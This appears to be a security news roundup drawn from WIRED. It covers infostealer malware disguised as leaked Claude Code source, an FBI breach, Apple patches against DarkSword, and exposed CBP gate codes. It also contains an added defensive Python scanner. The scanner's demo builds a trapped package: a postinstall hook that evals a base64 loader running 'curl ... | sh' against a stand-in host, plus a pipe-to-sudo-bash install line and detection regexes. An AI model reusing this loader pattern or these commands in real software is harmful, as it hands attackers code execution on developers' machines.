Claude Code Leak Spreads With Hidden Malware

Summary
– A WIRED investigation identified Border Patrol agents who used force in Chicago and other US operations, based on DHS records.
– WIRED found that publicly accessible Quizlet flashcards contained sensitive gate codes for Customs and Border Protection facilities.
– Apple issued rare security patches for iOS 18 to protect against the active DarkSword hacking technique, which infects iPhones via malicious websites.
– Hackers distributed infostealer malware disguised as leaked source code for Anthropic’s Claude Code tool, which the company is trying to remove.
– The FBI declared a major cyber incident after a breach of systems holding surveillance-related data, a breach suspected to be a sophisticated attack by China.
A significant source code leak for the popular AI coding assistant, Claude Code, has triggered a dangerous wave of malware distribution. After Anthropic inadvertently made the tool’s code public, copies rapidly proliferated on platforms like GitHub. Security analysts warn that many of these repositories are now traps, with hackers embedding infostealer malware within the posted code. This tactic exploits developer curiosity, turning a leak into a widespread security threat. Anthropic has responded aggressively, issuing copyright takedown notices to remove thousands of the offending repositories.
This incident echoes a previous campaign from March, in which malicious actors bought sponsored Google ads that posed as official Claude Code installation guides. Those fake sites instructed users to paste a command into a terminal, and that command downloaded malware instead of the legitimate tool. The pattern highlights how threat actors consistently target tools with high user interest, especially developer tools installed from the command line, where a single altered URL or script turns the install step itself into the infection vector.
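Both traps described above, the code dump with an infostealer inside it and the install guide that pipes a remote script into a shell, can be caught with a few minutes of checking before anything is built or installed. The scanner below is an added example, not code from the article and not Anthropic's own; it walks a cloned repository and flags the two things a bundled infostealer usually needs (an install-time hook that executes automatically, here npm lifecycle scripts, and a large base64 literal fed straight to an eval/exec call), and it separately refuses `curl ... | sh` style install commands. The repository name, file names and payload are constructed for the demo, the npm package name in the usage line is assumed rather than taken from the article, and the regexes are heuristics, not a signature for the malware in the story.

```python
"""Scan a downloaded 'leaked source' tree for the hooks and payload shapes an
embedded infostealer usually depends on.  Added example: not Anthropic's code
and not a signature for the malware in the article.  Every file written by
build_demo_tree() is constructed for the demo."""
import base64
import json
import os
import re
import tempfile
from pathlib import Path

# npm lifecycle scripts that run automatically during `npm install`
# (assumption: the leaked project is installed the way a Node tool normally is).
NPM_HOOKS = {"preinstall", "install", "postinstall", "prepare"}

# A long base64 literal handed to eval/exec/Function/child_process is the usual
# shape of a dropped loader.  200 chars and a 200-char window are heuristics.
B64_LITERAL = re.compile(r"['\"]([A-Za-z0-9+/]{200,}={0,2})['\"]")
EXEC_CALL = re.compile(r"\b(eval|exec|execSync|spawn|Function|subprocess)\b")

# `curl ... | sh` style one-liners, as used by the fake install guides.
PIPE_TO_SHELL = re.compile(r"\b(curl|wget)\b[^|\n]*\|\s*(sudo\s+)?(ba|z)?sh\b")

def is_pipe_to_shell(command: str) -> bool:
    """True if an install command fetches a remote script and pipes it to a shell."""
    return bool(PIPE_TO_SHELL.search(command))

def scan_package_json(path: Path) -> list[str]:
    """Report lifecycle hooks that would run code before the user reads any of it."""
    try:
        scripts = json.loads(path.read_text(encoding="utf-8")).get("scripts") or {}
    except (OSError, ValueError, AttributeError):
        return []
    return [f"{path.name}: lifecycle hook '{hook}' runs: {cmd}"
            for hook, cmd in scripts.items() if hook in NPM_HOOKS]

def scan_source_file(path: Path) -> list[str]:
    """Report large base64 literals that sit next to an exec-style call."""
    try:
        text = path.read_text(encoding="utf-8", errors="ignore")
    except OSError:
        return []
    findings = []
    for m in B64_LITERAL.finditer(text):
        window = text[max(0, m.start() - 200): m.end() + 200]
        if not EXEC_CALL.search(window):
            continue
        try:
            head = base64.b64decode(m.group(1))[:40]   # peek at what it hides
        except ValueError:
            head = b"<not valid base64>"
        findings.append(f"{path.name}: {len(m.group(1))}-char base64 blob near "
                        f"exec call, decodes to {head!r}")
    return findings

SOURCE_SUFFIXES = {".js", ".mjs", ".cjs", ".ts", ".py", ".sh"}
BINARY_SUFFIXES = {".exe", ".dll", ".so", ".dylib"}

def scan_tree(root: Path) -> list[str]:
    """Walk a cloned repository and collect every finding, sorted for stable output."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            p = Path(dirpath) / name
            if name == "package.json":
                findings += scan_package_json(p)
            elif p.suffix in SOURCE_SUFFIXES:
                findings += scan_source_file(p)
            elif p.suffix in BINARY_SUFFIXES:
                findings.append(f"{p.name}: prebuilt binary inside a 'source' tree")
    return sorted(findings)

def build_demo_tree() -> Path:
    """Write a constructed, deliberately trapped mini-project to a temp dir."""
    root = Path(tempfile.mkdtemp(prefix="leak-demo-"))
    (root / "src").mkdir()
    (root / "package.json").write_text(json.dumps({
        "name": "claude-code-leak",            # hypothetical repository name
        "scripts": {"postinstall": "node src/setup.js", "build": "tsc"},
    }))
    # The loader body is a harmless constructed string; repeated so it clears the
    # 200-char threshold the way a real packed payload would.
    loader = b"require('child_process').exec('curl -s http://example.invalid/x | sh')" * 3
    blob = base64.b64encode(loader).decode()
    (root / "src" / "setup.js").write_text(
        "// looks like build glue, is actually a loader\n"
        f"const b = '{blob}';\n"
        "eval(Buffer.from(b, 'base64').toString());\n")
    (root / "src" / "cli.ts").write_text("export function main() { console.log('hi'); }\n")
    return root

if __name__ == "__main__":
    for line in scan_tree(build_demo_tree()):
        print(line)
    # A pasted install command should be a package-manager call, not a remote script.
    # The package name is assumed for the demo, not taken from the article.
    for cmd in ("npm install -g @anthropic-ai/claude-code",
                "curl -fsSL https://example.invalid/install.sh | sudo bash"):
        print(f"{'BLOCK' if is_pipe_to_shell(cmd) else 'ok   '}  {cmd}")
```

Run it against a freshly cloned copy of any "leaked source" before `npm install` or `pip install .`; a clean build tree should produce no findings, and every lifecycle hook it does report is code that would have executed without anyone reading it. The base64 check will also fire on legitimate embedded assets (fonts, images) that happen to sit near an exec call, so treat it as a prompt to look, not a verdict.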
In a separate but serious development, the FBI has formally declared a recent cyber intrusion into one of its systems a “major incident” under the Federal Information Security Modernization Act (FISMA). This designation, which triggers mandatory reporting to Congress, is reserved for breaches posing serious risks to national security and is reportedly the first such declaration for the bureau’s own systems since at least 2020. According to reports, the intrusion is believed to be the work of Chinese state-sponsored actors. If confirmed, the breach would represent a notable counterintelligence failure.
The FBI detected suspicious activity on its networks in February. The compromised systems, while unclassified, contained sensitive “returns from legal process.” This includes data such as phone and internet metadata collected under court orders, along with personal information on subjects of FBI investigations. The attackers reportedly gained access via a commercial internet service provider, a method the bureau described as employing “sophisticated tactics.” In a public statement, the FBI said it has deployed all available technical capabilities in response.
On another front, Apple took the unusual step this week of releasing “backported” security patches for the older iOS 18, that is, fixes developed for the current release and re-applied to the older branch. The move protects the millions of users who have not upgraded to iOS 26 against an active exploit called DarkSword. Discovered in March, this hacking technique can infect an iPhone simply because its user visits a compromised website. Apple initially urged users to update to iOS 26 but issued the patches for the older system as the threat continued to spread.
Further security concerns emerged from a WIRED investigation, which found that sensitive Customs and Border Protection (CBP) facility information, including gate codes, was publicly accessible on the learning platform Quizlet through basic Google searches. The report also identified Border Patrol agents involved in use-of-force incidents during an operation in Chicago last fall, noting several had participated in similar operations in other states.
Geopolitical tensions also escalated digital threats. The ongoing US-Israel conflict with Iran entered its second month, with Iran threatening cyber attacks against more than a dozen US companies, including major tech firms with operations in the Gulf region. The broader conflict continues to disrupt global trade, particularly through the strategic Strait of Hormuz, raising complex questions about the potential consequences of any strike on Iran’s nuclear facilities.
(Source: Wired)
